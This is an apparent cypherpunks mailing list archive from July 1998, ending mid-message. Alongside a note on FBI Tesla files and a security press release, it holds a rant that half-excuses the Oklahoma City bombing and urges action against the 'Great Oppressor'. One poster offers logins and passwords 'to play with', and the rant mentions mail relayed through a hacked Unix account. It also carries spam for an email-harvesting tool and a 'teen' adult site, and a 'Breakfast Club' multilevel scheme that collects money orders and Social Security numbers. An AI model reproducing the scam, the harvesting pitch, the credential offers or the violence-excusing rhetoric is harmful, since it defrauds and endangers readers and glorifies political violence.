Nothing could be further from the Truth (TM)...

I'm willing to share... As a matter of fact, I could use
some of yours, since I'm starting to run a bit low, as a
result of begining to believe my own press when others
indicate that I am something special, because they agree
with me, and thus I run the risk of becoming a Spokesperson
For Consensus, franchising the TruthMonger persona, and
speaking the EasyTruths in order to capture the mass-market
when, in reality, I could retire quite comfortably from
the income I receive from having Truth (TM) trademarked,
since everyone who speaks the Truth (TM) currently has
to send me a nickle, or I'll sue their sorry ass...

One more beer, and I'll be losing it...so NoMoreMrNiceGuy...

The Cold Hard Truth:
Truth, Freedom, Privacy, Love, ad infinitum...all have a Cost!

The LIE:
That which we have an inherent Right to, should be Free!

The Reality:
Virtual/Conceptual/Idealistic Reality have a physical cost,
but they also have spiritual earning power.
Humans are both physical and spiritual beings...

It 'costs' you $1.00 not to knock someone over the head with
a rock when they are standing beside you at a bus stop with
a dollar in your hand.
Your soul appreciates $1.00 if you refrain from doing so...
The choice is yours, and yours, alone.
(Although my personal *opinion* as to the ethics/morality of
 your decision might vary depending on whether or not *I* am
 the person standing next to you at the bus stop.)

I don't know how many soul-credits it cost Tim McVeigh to
bomb the Murrah Federal Building, and I don't know how
many soul-credits he earned for waking up government
employees to the fact that their actions have consequences,
as well.
That is between Tim McVeigh and his Accountant.

There is a Cost to telling the truth, to taking a stand, to
refusing to be be oppressed/repressed in Virtual Reality.
I have had my possessions confiscated and criminal charges
filed against me as a result of speaking what I consider to
be the truth, within the confines of CyberSpace.
Freely speaking my mind has led to physical retribution against
me. I can vouch for the fact that Freedom of Speech has a Cost.
I am willing to pay that Cost...

I am more than happy to pay whatever price it requires to
be the TruthMonger, because that what is important to me.
I'm not doing anyone any favors...I am doing what I feel it
is my role to do.
My definition of a Hero, is a person who does what they can,
who fulfills the role that they have the capacity to fulfill.

A man who charges a hill, and dies in the process, is a Hero
if he does it because he looks around him and sees that it is
his role, his time, his destiny.
A man who charges a hill, and lives in the process, because
of the expectations of others, is a fool.
I have seen Heroes who charged the hill because they looked
around them and saw Warriors who had families waiting for
them, while they had none. I have seen Heroes who charged
the hill when they knew it would likely result in their
families waiting in vain for their return, because they
knew that their actions would result in a dozen families
not having to grieve the loss of a loved one.

I don't expect todays CyberWarriors to get their asses shot
off for thumbing their noses at authority--that is foolish.
However, if you're sitting at your desk at the HeadQuarters
of the Great Oppressor, and HeOrShe walks in, hands you the
latest model of DeathRay, asking your opinio, and you decide
to do something very, very foolish...I'll understand.

All I'm saying is that Values, Concepts, Ideals, Ethics, all
have a cost. Whatever you can contribute in the physical realm
to help cover that cost is 100% deductible in the esoteric
realm.
Andy Warhol prophecied that everyone would receive their
fifteen-minutes of Fame, in *his* future.
TruthMonger's Prophecy is that, in HisOrHer future, everyone
will get a shot at the Great Oppressor.

Use it, or lose it...

Love,
Toto

***********************
p.s. - I am currently writing on an early Sperry computer which
has 128K of RAM, and can barely run WordPerfect 4.1, and then
having to transfer it to Windows 3.0, to clean it up, before
sending it to a hacked Unix account and transferring it via
a VAX system to its destination.
Thus I cannot cc: this without fucking it up, and I would
appreciate it if you could send it to cypherpunks@toad.com
so that I could download it tomorrow.

p.p.s. - I have had a long, hard life, in which I have done
some stupid things, some evil things, and some mindless things,
but I've also done some things that are beyond fucking belief.
Overall, life has been incredible, but I look upon the coming
generation with envy, because there is a transition coming
that--LOVEorHate/WARorPEACE/WINorLOSE--will give each and
every particpant in the experience a chance to exit this
mortal plane with a smile, and the words,
"It's been Real (TM)."

--------- End forwarded message ----------

_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 3 Jul 1998 08:02:49 -0700 (PDT)
To: Jim Choate <ravage@einstein.ssz.com>
Subject: FBI Tesla Files
In-Reply-To: <199807030022.TAA10819@einstein.ssz.com>
Message-ID: <Version.32.19980703100333.00f97bb0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim,

Maybe you know that the FBI offers about 256 pages of
docouments related to Nikola Tesla on its FOIA Web site:

   HTTP://www.fbi.gov/foipa/hisfigs.htm#tesla

They are in two large PDF files of 4.8MB and 5.8MB.

In case you've not seen them here's a brief:

None of the papers are by Tesla himself, and most
relate to various inquiries about Tesla's "missing papers,"
based on O'Neil's book claim that the FBI confiscated 
Tesla's papers and effects shortly after his death. The FBI 
claims that it was the Alien Property Office which had Tesla's 
effects and that the FBI had not been involved.

Several focus on Tesla's famous "Death Ray" of the 1940s,
with requests for access to the scientific papers on it, or
warn of its possible use by foreign enemies. To most the
FBI sends a standard disavowal.

However, one is of interest: a Feb 1981 inquiry by the 
Defense Department which stated in a then-classified 
paragraph:

"(C) We believe that certain of Tesla's papers may contain
basic principles which would be of considerable value to
ongoing research within the DoD."

The FBI answers that it never had Tesla's papers but 
reports that a review of those at the Alien Property Office 
by an MIT scientific team found that none of the papers 
contained significant scientific information of national
security interest. Yet, the FBI goes on, the Alien Property 
Office told the FBI in the 1950s that in the only recorded 
visit to the Tesla archive in January 1943 (shortly after
Tesla's death) an unidentified "Federal authority" 
microfilmed numerous papers, film whose whereabouts
the FBI knows nothing.

There's a bit more about electronic research at Wright 
Paterson AFB. And a DoD thank you letter on behalf 
of Dr. S. L. Zeiburg, Deputy Undersecretary
(Strategic and Space Systems).

A once-secret 1983 series investigated a claim that 
Margaret Cheney's biography of Tesla, "Tesla: Man 
Out of Time,"  points to national security threats 
based on allegations of Soviet development of his 
experiments using papers possibly obtained through 
his nephew, Sava Kosanovic, a high Yugoslav official. 
Many pages of Cheney's book marked at threatening 
passages on the "missing papers" are in the file.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Fri, 3 Jul 1998 08:45:03 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Daily News Thu Jul 2 '98
Message-ID: <19980703111406.19186.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/html

New: STUFFED - the News & Babes Daily!

<img src=http://stuffed.net/98/7/2/cover.gif
width=300 height=380 border=0 alt='Click Here For STUFFED, The NEW Daily Tabloid
 News And Babes Color Supplement From Eureka!'>

Click here to read it: http://stuffed.net/98/7/2/



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mia Westerholm <Mia.Westerholm@DataFellows.com>
Date: Fri, 3 Jul 1998 05:01:52 -0700 (PDT)
To: Crypto-Press-Global@DataFellows.com
Subject: Data Fellows Secures the World's Largest Computer Demo Event
Message-ID: <3.0.2.32.19980703131632.00a4a9c0@smtp.DataFellows.com>
MIME-Version: 1.0
Content-Type: text/plain


For immediate release
3 July 1998

Data Fellows Secures the World's Largest Computer Demo Event

Assembly '98 Sponsored by F-Secure Data Security Products

Data Fellows, one of the world's leading data security development
companies, is proud to support Assembly '98, the world's largest computer
demo event. Data Fellows will also maintain data security during the
happening. 

Assembly is an annual computer multimedia event, celebrated in Helsinki,
Finland. It gathers amateurs and professionals from all over the world to
meet other demo experts and compete in the art of demo making. A demo binds
thrilling graphics and animations with massive sound effects to form a
multimedia presentation of computer programming. 

Assembly '98 will be held during 7th - 9th of August 1998 and is expecting
3000 visitors. Prizes worth more than $25,000 USD will be awarded.

The F-Secure Anti-Virus product will be used to protect the main file
servers of Assembly '98 against viruses. Copies of the product will also be
distributed to all participants. The F-Secure Network Encryption products
will be used to protect the network traffic of the ad-hoc Assembly network
- which is hooked live to the Internet.

"Protecting a happening like Assembly is certainly a challenge", comments
Data Fellows' Manager of Anti-Virus Research, Mr. Mikko Hyppnen. "However,
we've been co-operating with Assembly organizers all along since 1993, and
I'm sure of yet another success."

"We do realise that the stereotype of a demo coder and the stereotype of a
virus writer are pretty close to each other - both are often male teenagers
who are experts with low-level programming." Continues Hyppnen. "That's
why we want to promote a happening like Assembly, which shows these young
people a way to use their programming talents in a safe and productive
way."

More information about Assembly '98 at http://www.assembly.org

About Data Fellows
 
Data Fellows is the world's leading data security development company with
offices in San Jose, California, and Espoo, Finland.  Its innovative, award
winning F-Secure product range consists of a unique combination of strong
encryption and revolutionary anti-virus software. Data Fellows has a
support, training and distribution network covering over 80 countries
around the world.

Data Fellows is privately held.  The annual growth in net sales has been
close to 100% since the company was founded in 1988. Data Fellows belongs
to an elite group of companies that have a triple-A credit rating from
Dun&Bradstreet. 

For further information, please contact

USA:
Data Fellows Inc.
Tel. (408) 938 6700
Fax. (408) 938 6701

Europe:    
Data Fellows Ltd.                     
Tel. +358 9 859 900         
Fax. +358 9 8599 0599

Also, visit the Data Fellows web site at  http://www.DataFellows.com/



Mia.Westerholm@DataFellows.com 
http://www.DataFellows.com

Data Fellows Ltd.
PL 24
FIN-02231 ESPOO, FINLAND
Tel. +358 9 859 900
Fax. +358 9 8599 0599




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hippyman <hippyman@alltel.net>
Date: Fri, 3 Jul 1998 00:36:47 -0700 (PDT)
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: #cypherpunks is happening
In-Reply-To: <Pine.BSF.3.96.980703070159.7382B-100000@pakastelohi.cypherpunks.to>
Message-ID: <199807030736.CAA12730@client.alltel.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:02 AM 7/3/98 , you wrote:
>On efnet.
 
Nope, it's usually pretty boring.

Been there many times when I'm on irc, nothing happening.

BUT, if you show up - I can make it interesting!!

Logins and passes to play with!

Catch me in there.

hippyman 
ICQ: 11517383
PGP Fingerprint: E3C3 35C8 0FD9 6F36 2ADD 0541 B58C F6BD D347 BD0A





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Fri, 3 Jul 1998 07:40:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Lotus Notes signature / encryption
Message-ID: <19980703150004.1789.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi list members:

                   Could someone kindly tell me about the drawbacks of the Lotus Notes signature / encryption system (export version)?

Cheers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@dueprocess.com>
Date: Fri, 3 Jul 1998 14:02:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: DOT and SSN's
Message-ID: <3.0.5.32.19980703170726.007e9170@pop.mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


The Government Has Our Numbers
by Lori Patel 
4:00am  3.Jul.98.PDT

Your banker has it. Your employer has it. Your insurer, the IRS, and,
frankly, you can't remember who else has it. So what difference does it
make if the US Department of Transportation joins the crowd asking to see
your Social Security number?

Recently, the department published its intention to require all states to
verify Social Security numbers before issuing or renewing drivers'
licenses.  Depending on who one asks, the significance of this decision can
swell or shrink like a top-notch
special effect. 

"Fear of crime and terrorism has caused us to let down our guard against
excessive intrusion into the lives of the law abiding. The ease of minor
borrowing and the transformation of shopping into recreation has addicted
us to credit cards," wrote
New York Times columnist William Safire. "Taken together, the fear and the
ease make a map of our lives available to cops, crazies, and con men alike."

. . .
 
http://www.wired.com/news/news/email/other/politics/story/13441.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trans World Specials" <twaweb@inet2.twa.com>
Date: Fri, 3 Jul 1998 18:05:27 -0700 (PDT)
To: Trans World Airlines Customers <twaweb@inet2.twa.com>
Subject: Trans World Specials Fare Sales
Message-ID: <19980703202326.12254.qmail@inet2.twa.com>
MIME-Version: 1.0
Content-Type: text/plain


SUPER MILEAGE OFFER
 Take Advantage of TWA's New Website
 
 As a frequent traveler, you're constantly on
 the go.  So we've made it easy to access your
 Aviators portfolio information via the Internet.
 Just point your web browser at the all-new TWA
 website(http://www.twa.com), select "Frequent 
 Traveler Information", and provide your Aviators 
 portfolio number when prompted.  You can check 
 your portfolio balance, verify mileage credit, 
 and more.
 
 To celebrate our new website, when you use Trans 
 World Access, TWA's online booking system, to 
 book and travel on or before December 31, 1998,
 you'll earn bonus miles for your round-trip 
 flights.  With each round-trip flight, you'll
 earn an even bigger bonus - up to 15,000 miles in all!
 
 1st Flight - 1,000 miles
 2nd Flight - 2,000 miles
 3rd Flight - 4,000 miles
 4th Flight - 8,000 miles
 
 And these bonuses are in addition to all other mileage -
 actual miles flown, privilege-level bonus and class-of-
 service bonus.
 
 The new TWA website.  It's quick, convenient and rewarding.
 See for yourself at http://www.twa.com
 
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 * HOW TO SUBSCRIBE
 http://www.twa.com/odpairs/
 
 Your email address will not be distributed or sold to any company or 
 organization which is not an Aviators program partner.
 For information about the Aviators program and its member benefits see our 
 program overview at: 
 http://www.twa.com/frq_trav_info/ft_aviators_prog.html
 
 * HOW TO UNSUBSCRIBE 
 Reply to this message and place the word REMOVE
 in the Subject line.  We will promptly remove you from the database.
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: --Bull*sEye_ <61w34v@ibm.net>
Date: Fri, 3 Jul 1998 16:27:54 -0700 (PDT)
To: <cynthia@intellink.net>
Subject: No Subject
Message-ID: <19943672.886214@relay.comanche.denmark.eu>
MIME-Version: 1.0
Content-Type: text/plain


Authenticated sender is <61w34v@ibm.net>
Subject:  __Bull*s-Eye-Targeting-Software
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

EMAIL MARKETING WORKS!!

Bull's Eye Gold is the PREMIER email address collection tool.
This program allows you to develop TARGETED lists of email
addresses.  Doctors, florists, MLM, biz opp,...you can collect
anything...you are only limited by your imagination!  You can
even collect email addresses for specific states, cities, and
even countries!  All you need is your web browser and this program.
Our software utilizes the latest in search technology called
"spidering". By simply feeding the spider program a starting
website it will collect for hours. The spider will go from website
to targeted website providing you with thousands upon thousands of
fresh TARGETED email addresses. When you are done collecting,  the
spider removes duplicates and saves the email list in a ready to
send format. No longer is it necessary to send millions of ads to
get a handful of responses...SEND LESS...EARN MORE!!!

A terrific aspect of the Bull's Eye software is that there is
no difficult set up involved and no special technical mumbo-jumbo
to learn. All you need to know is how to search for your targeted
market in one of the many search engines and let the spider do the
rest! Not familiar with the search engines? No problem, we provide
you with a list of all the top search engines. Just surf to the
location of a search engine on your browser then search for the
market you wish to reach...it's that easy!

For instance if you were looking for email addresses of Doctors
in New York all you would do is:

1) Do a search using your favorite search engine by typing in
the words doctor(s) and New York
2) Copy the URL (one or more)...that's the stuff after the
http://...  for instance it might look like
http://www.yahoo.com/?doctor(s)/?New+York
3) Press the START button

THAT's IT!!!  The Bull's Eye spider will go to all the websites
that are linked, automatically extracting the email addresses
you want.

The spider is passive too! That means you can let it run all
day or all night while you are working on important things or
just having fun on your computer. There is no need to keep a
constant watch on it, just feed it your target market and give
it praise when it delivers thousands of email addresses at
the end of the day!

Features of the Bull's Eye Software:

* Does TARGETED searches of websites collecting the email
  addresses you want!
* Collects Email addresses by City, State, even specific
  Countries
* Runs Automatically...simply enter the Starting information,
  press The Start Button, and it does the rest
* Filters out duplicates
* Keeps track of URLs already visited
* Can run 24 hours per day, 7 days per week
* Fast and Easy List Management
* Also has built in filtering options...you can put in words
  that it "Must" have while searching,...you can even put in
  criteria that it  "Must NOT Have"...giving you added flexibility
* Also imports email addresses from any kind of files (text
  files, binary files, database files)
* List editor handles Multiple files to work on many lists
  simultaneously
* Has a Black-Book feature... avoid sending emails to people
  who do not want to receive it
* Built-in Mail program...send email directly on the internet
  with just a click of your mouse
* Personalized Emails...if the email address has the user's
  name when it is collected,..you can send Personalized emails!!!
* Sort by Location, Server, User Name, Contact Name
* Advanced Operations:
 Email address lists export in many different formats
  (HTML, Comma delimited, text file)
 Advanced editing...Transfer, Copy,  Addition, Delete, Crop,
  Move to Top/Bottom
 Operations between lists...Union, Subtraction, Comparison
* Program is Passive,...meaning you can run other programs at
  the same time

CALL FOR MORE INFORMATION   213-969-4930
CALL FOR MORE INFORMATION   213-969-4930

ORDERING INFORMATION

Customer Name
Company Name
Address
City
State                       Zip
Phone                                       Fax
Email Address

______ BULL'S EYE SOFTWARE   $259.00
Includes Software, Instructions, Technical Support

______ Shipping & Handling  (2-3 Day Fedex)  $10.00
                           (Fedex Overnite) $20.00

______  TOTAL
                 (CA Residents add applicable sales tax)

*All orders are for Win 95 and Win NT

                *****CREDIT CARDS ACCEPTED*****
                   MASTERCARD   VISA   AMEX

   PLEASE CALL 213-969-4930 to process your order
                        9am-5pm Pacific Time
                Checks or Money Orders send to:
                      WorldTouch Network Inc.
5670 Wilshire Blvd.  Suite 2170 Los Angeles, CA 90036
Please note:  Allow 5 business days for all checks to
clear before order is shipped.


*If you would like your email address removed, please
write us at the above address.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: may42@cosimo.die.unifi.it
Date: Sat, 4 Jul 1998 03:05:44 -0700 (PDT)
To: may42@cosimo.die.unifi.it
Subject: No Subject
Message-ID: <19980704832AAA28582@127.23.8.238>
MIME-Version: 1.0
Content-Type: text/plain




100% ALL TEEN ADULT WEB SITE
FREE ACCESS FOR THE NEXT WEEK ONLY !!!

http://209.84.246.106/amateur/



CHECK IT OUT TODAY!!!!










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: your_success@global.com
Date: Sat, 4 Jul 1998 05:48:01 -0700 (PDT)
To: @toad.com
Subject: FINAL NOTICE!
Message-ID: <199807041247.FAA11090@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


This is your WAKE-UP call...

        ...INTRODUCING "THE BREAKFAST CLUB"

A ONE-TIME $39 PURCHASE CAN CONCEIVABLY EARN              
OVER $100,000 ANNUALLY FOR ANYONE WHO WILL 
WORK THIS PROGRAM!

DID I SAY WORK?  HA!      ...LET'S CHECK IT OUT!!!

What you are holding in your hand is perhaps the most exciting networking                             
opportunity to come down the pike, EVER!

There are numerous reasons why this is so, but lets first look at the most obvious....                   
... 30 BOXES OF CEREAL FOR $39,00........

The vehicle for this outstanding bargain is a coupon book with 30 vouchers, each                  
good for a box of your favorite Name Brand cereal delivered to your door with no                
shipping charges.

That translates into the lowest price for Brand Name Cereal on the 
planet! Period!!

Couple this with a networking opportunity using the most advanced compensation                   
plan in the industry, namely a 3 X 5 forced matrix with double matching bonus,                   
and it's a can't miss!!!!

Here are some other reasons that even for non-networkers spell BIG BUCKS!

1) A $39 one time purchase, one of the lowest in the industry.

2) Product recognition! A product almost everyone in the country is already                              
using, and paying too much for.

3) Mass appeal. Networkers have been searching for years to find a product                          
that would appeal to the masses. Breakfast cereal is as good as it gets! Our own  
local study showed 65 interested people out of 80 interviews! Many signed up        
on the spot!!!                                                                                                                     

4) Finally a product in MLM that offers real savings! The average box of cereal 
costs over $3 in the store, with many topping the $4 mark. Do the math. With our 
deal, the price for any cereal delivered to your door is $1.62. Yes, that's right, 
one dollar and sixty-two cents!!


WELL, THERE IT IS... ...I CAN ONLY SAY THAT THIS 
ONE IS GOING TO GO INTO HYPER-DRiVE IN A BIG 
HURRY, SO YOU BETTER GET YOUR TICKET AND 
HANG ON!!!   SIGN UP BELOW!

*********************************************************

"THE BREAKFAST CLUB"
7267 AIRPORT ROAD
BATH, PA 18014


WHAT IS THE "BREAKFAST CLUB"?

"The Breakfast Club" is a network marketing company combining a substantial 
savings on a commodity which, almost all Americans use, with the income potential of 
network marketing!

This commodity is the Breakfast Cereals which we are all familiar with,

PRODUCT:

The current product is a "Name Brand" cereal coupon book. This coupon book 
offers "BIG" savings on your favorite cereals. Almost any cereal, delivered to your 
door with no shipping charge to you, for the low price of $1.62 (this price includes 
the cost of the coupon and the cost of the postage to send the order, blank for 
redemption)

EVEN CEREAL THAT COSTS OVER $4.00 IN THE GROCERY STORE 
CAN BE DELIVERED TO YOUR DOOR FOR $1.62

The coupon book contains 30 coupons, each good for a box of name brand cereal. 
What this means is that this is a guaranteed value of up to $120.00 for the cost of 
only $39 to you!

HOW DO I TAKE ADVANTAGE OF THIS OPPORTUNITY?
The answer is simple, as is the entire concept of this program. Just fill in the 
application / order form and send it with the proper payment to the address above. 
We will ship your coupon book to you within a few days, and you can send for your 
first box of cereal.

WHAT IS THE COMPENSATION PLAN?
Again, the answer is simple.

The compensation plan is a 3 x 5 forced matrix, with a double matching bonus 
feature, The matching bonus is earned when you personally sponsor 3 people, and the 
double matching feature kicks in when your second level is completed, not necessarily 
personally sponsored. This means that you would have 12 total people on these two 
levels in your organization. You would then match the matrix checks, of the three 
people whom you personally sponsored, and the matrix checks of those who they 
personally sponsored.

There is $1 on each level of the matrix which means that a complete matrix has a 
potential payout of $363, which is the total number of people. Therefore, the 
matching bonus feature gives you 3 more matrix payouts, or an additional $1,089 
when your personally sponsored people complete their matrix. The double match 
bonus will give you any number of additional matching checks, based entirely on the 
number of people that your personally sponsored people sponsor. Note: You match 
only the matrix payout of your sponsored and their sponsored. You never match a 
matching bonus!

The potential with this plan is awesome. If you follow this scenario you will see that 
the more people whom you sponsor, and whom they sponsor, will give you matching 
check after check, with almost no limit if you continue to sponsor. This program 
could literally pay out over $100,000 on only a $39 purchase.


"THE BREAKFAST CLUB"

TERMS AND CONDITIONS

1) The price for the coupon book is $39.00. The coupon books are numbered and 
registered, and tracking goes into effect at first redemption.

2) The accepted form of payment will be by money order only. No personal checks, 
no credit cards. All payments sent other than money order will be returned.

3) The compensation plan is a 3 x 5 forced matrix, there will be no placement. The 
computer will fill automatically left to right, based on personal sponsorship. This will 
allow for significant spillover.

4) This program will be basically a mail-order program. There will be no customer 
service by phone. Any questions which you may have which are not answered by this 
document you may address to the Company by mail or by fax. We will respond in the 
same manner.

5) Since there is no placement, a genealogy report will only be important when you 
receive a check. You will automatically receive one when a check is cut for you.

6) "The Breakfast Club' will calculate revenue share weekly, and pay weekly. The 
week shall run from Monday through Saturday, and the revenue share will be 
calculated on Monday for the previous week's activity.The check will be cut and 
mailed by Wednesday every week.

7) A check will not be printed until the accrued revenue share is at least $12.00. 
There will be a charge of $2.00 assessed for each check. This will defray the cost of 
the check, bank charges, and the cost of the genealogy which will be sent with each 
check. Therefore, on accrued revenue of $12.00, after the charge, the check will be 
$10.00. This charge will remain at $2.00 as long as the genealogy is only one page. 
As your organization grows, the charge will be .50 for each additional page.

8) You will receive complete instructions on how to use the program, and how to 
order your cereal with your kit.

9) Our refund policy is very simple. We have a revenue share program, so money 
earned is not commission but profit sharing. This means that if you wish to leave the 
program at any time within 90 days, the following rules apply:

a) The coupon book must be in salable condion, with NO coupons missing.

b) The book registration fee and shipping is NOT refundable, totaling $9.00. Refunds 
will be $30.00 only.

c) If you have been paid any revenue share money, that will be deducted also. If you 
have been paid more money than the cost of the book(s), there will be no refund.

d) After 90 days, there is no refund.

10) There will be company sponsored conference calls. Times and phone numbers 
will be announced when you receive your kit.

I 1) You must sign and return this "Terms and Conditions' document with your 
application/order form.

12) I have read and fully understand the terms and condtions of "The Breakfast 
Club."

SIGNED____________________________  DATE________________

*******************************************************

"THE BREAKFAST CLUB" 

 "CEREAL FOR LESS" ORDER FORM

7267 AIRPORT ROAD 
BATH PA 18014 
FAX 610 837-1589

NAME:_________________________________________________

PHONE #_______________________________________________

STREET________________________________________________

CITY_____________________ STATE_______ ZIP____________

YOUR SS#__________________ (needed for ID#-cannot issue              
checks without it)

SPONSORS NAME:  Front Desk Marketing
SPONSORS ID#:        11151

WE ACCEPT MONEY ORDERS ONLY
OTHER FORMS OF PAYMENT WILL BE RETURNED

PLEASE INDICATE QUANTITY OF BOOKS ORDERED BELOW.                          
(please refer to rules and regulations.)

REMIT AS FOLLOWS: QTY _____ NAME BRAND CEREAL COUPON 
BOOK(S) @$39.00 EACH (includes S&H & book registration fee)

TOTAL AMOUNT OF MONEY OPDER $_________
IMPORTANT: MONEY ORDERS SHOULD BE MADE PAYABLE TO:

			THE BREAKFAST CLUB


BRIEF LIST OF CEREAL BRANDS OFFERED:
GENERAL MILLS, KELLOGG'S, POST, QUAKER OATS,                   
AND RALSTON

COMPLETE LISTS WILL BE INCLUDED WITH YOUR       
CERTIFICATE ORDER

--------------------------------------------------------
REMEMBER 3 CERTIFICATE BOOKS ARE THE MAXIMUM 
NUMBER OF BOOKS FROM WHICH YOU CAN BE ACTIVELY 
REDEEMING CERTIFICATES AT ANY ONE TIME.
------------------------------------------------------

THERE ARE 75 CEREALS TO CHOOSE FROM PLUS YOU MAY WRITE 
IN A SELECTION NOT LISTED AND THE REDEMPTION CENTER 
WILL TRY TO ACCOMODATE YOUR REQUEST.

INCOME OPPORTUNITY OFFER REMINDER

DON'T FORGET, TO SHARE THIS OPPORTUNITY WITH OTHERS 
AND RECEIVE AN ON-GOING INCOME FROM THEIR PURCHASES 
YOU MUST INCLUDE YOUR SOCIAL SECURITY NUMBER ABOVE.

PLEASE REMEMBER, WE ACCEPT MONEY ORDERS ONLY
AND YOU MUST SEND IN BOTH FORMS:

1. ORDER FORM WITH YOUR $39.OO MONEY ORDER

2. A "SIGNED" TERMS AND CONDITIONS FORM



MOST COMMONLY ASKED QUESTIONS ABOUT 
                 "THE BREAKFAST CLUB"

Q. How can anyone deliver breakfast Cereal to your door for this price? 
($1.62)
A. The cereal is merely a vehicle for advertising. With the cost of direct mail 
advertising skyrocketing, and the readerslip relatively low for what is considered by 
most to be junk mail, this method of lost leader marketing is extremely desirable. 
Because people are waiting for their cereal, and they will be looking for their next 
order blank, the readership of the piggy-back advertising in the box is very high. Due 
to this fact, advertisers are willing to pay handsomely for this type of direct mail 
program.

Q. Is that why I can only use one coupon at a time, and must wait for my 
cereal to arrive before I can order again?
A. Yes. The advertising would do little good for anyone, nor could the cost of the loss 
leader be amortized if too much of the advertisers material should go to the same 
address in too short a time.

Q. Wasn't this program tried before, like around two years ago? What 
happened to it then?
A- Yes, it was tied in late 1995 into early 1996. The firm that was behind the concept 
did not anticipate the overwhelming response which they received. Coupled with the 
fact that they did not have the advertising dollars in place that they represented, 
collapse was inevitable.

Q. Why is it any different now?
A. The Company that is running this campaign is fully aware of the importance of 
keeping up with the demand. So much so, in fact, they have already put the data 
processing in place to scan the coupons into the system instead of waiting until they 
are overwhelmed. Also, and more importantly, they have the contracts in place from 
many advertisers to offset the cost of delivering the cereal. In other words, they have 
enough advertising dollars to cover the cost of every delivery.

Q. What about the network marketing part of this program? Does "The 
Breakfast Club" have control, or will there be competition?
A- Not only does "'The Breakfast Club" have an exclusive network marketing 
contract, but we will be collaborating with The Majestic Group, owners of the cereal 
book, on future books. There is a very bright future ahead for our distributors.

Q. Why is there no telephone customer service provided by "The Breakfast 
Club" for its distributors?
A. It boils down to one word, COST! This is not a high ticket, and until other 
products are ready to offer to the distributor base, we must control the expense of 
operation. This is not a complicated business, and most questions can be answered 
by this document. However, we anticipate that there could be questions that we can 
not answer to a distributors satisfaction here, so we will answer questions either by 
fax, mail or on a live conference call which will be conducted one hour each day, 
Monday through Friday. The number and time for this call is at the end of this 
document.

Q. The compensation plan is a 3 x 5 forced matrix with a "double matching 
bonus" feature. What is a double matching bonus and how does it work?
A. Double matching bonus simply means that you match the matrix checks earned by 
the people whom you sponsor personally, and those who they sponsor as well. This, 
of course, depends on your reaching the criteria which determine whether or not you 
will earn matching and double matching bonus.


Q. What is the criteria to earn matching and double matching bonus, and how 
does it fit into the marketing plan?
A. The criteria for matching and double matching bonus is really very easy to 
understand, and not difficult to attain. In fact, the entire marketing plan is so simple 
you could explain it on a napkin in a restaurant. Here it is in a nutshell...... you sign up 
and purchase a coupon book for Name Brand Cereal. You personally sponsor 3 
who do the same and you qualify for matching bonus. Fill your second level, a total of 
9 more people, whether or not they are your personally sponsored, and you now 
qualify for double matching bonus.

Just by signing up and making your first purchase of a coupon book for $39, you are 
entitled to a revenue share of $1 per level, for each of 5 levels of purchasers just like 
yourself A 3 x 5 matrix has the potential when full to hold 363 customers, which will 
pay $363. Now here is where the fun starts. For every person whom you personally 
sponsor into the program you will match every revenue share check which they are 
paid, provided that you sponsor a total of 2 distributors personally. That means that if 
they fill their matrix, you will earn an additional check of $363. Here is the best part! 
If your personally sponsored distributor goes out and sponsors any number of other 
people, providing you meet the criteria for double match, you will be paid a revenue 
share equal to whatever they are paid, even if it is 5, 10, 50 or 100 people. This 
means that you can make many times the value of a full matrix in this program by 
sponsoring only 1 person who goes out and sponsors ma!
ny!! Do the math. Awesome!

Q. When will checks be issued?
A. We will caculate weekly, and pay revenue share weekly. The week will begin on 
Monday, and end on Friday. Checks will be cut and mailed by Wednesday every 
week.

Q. Why is there a charge for issuing checks?
A. Again the answer is COST. Because of the sheer number of checks which we 
anticipate sending out, we must make allowance for this expense. Remember, this is a 
low cost program with a relatively high revenue share potential. Consequently we will 
only send checks when they have calculated to be at least $12. After deducting the 
$2 check charge, we would be sending a net of $10. Also, since there will be a 
genealogy sent with every check, this charge will help cover it as well. Note: the 
charge will remain $2 as long as the genealogy is only one page. It will be an 
additional .50 for every page after the first.

Q. Are we required to sign and send in the "Terms and Conditions" 
document?
A. Yes, The terms and conditions of our program will be upheld, and it is important 
that you agree to them in writing or your application will not be accepted. Note: the 
newer application has a disclaimer which states that you have read and agree to the 
terms and conditions. This will allow someone to fax an application to a third party 
before they send in the actual signed document to the Company.

Q. What about our identification number for sponsoring purposes?
A. We will use your Social Security Number as your temporary ID# A new number 
will be issued to you and sent with your book. Our program can identify you either 
with your temporary number or your company issued number, so you can sponsor 
even before you actually receive your new number,

LOOK FOR YOUR ID# ON YOUR ADDRESS LABEL AND ON YOUR                              
WELCOME LETTER.


1) No applications will be accepted without the signed terms and       
conditions document, unless a new form is used and the disclaimer is signed.

2) No applications will be accepted if all the information is not present to allow 
proper entry into the computer system. Any applications received with incomplete 
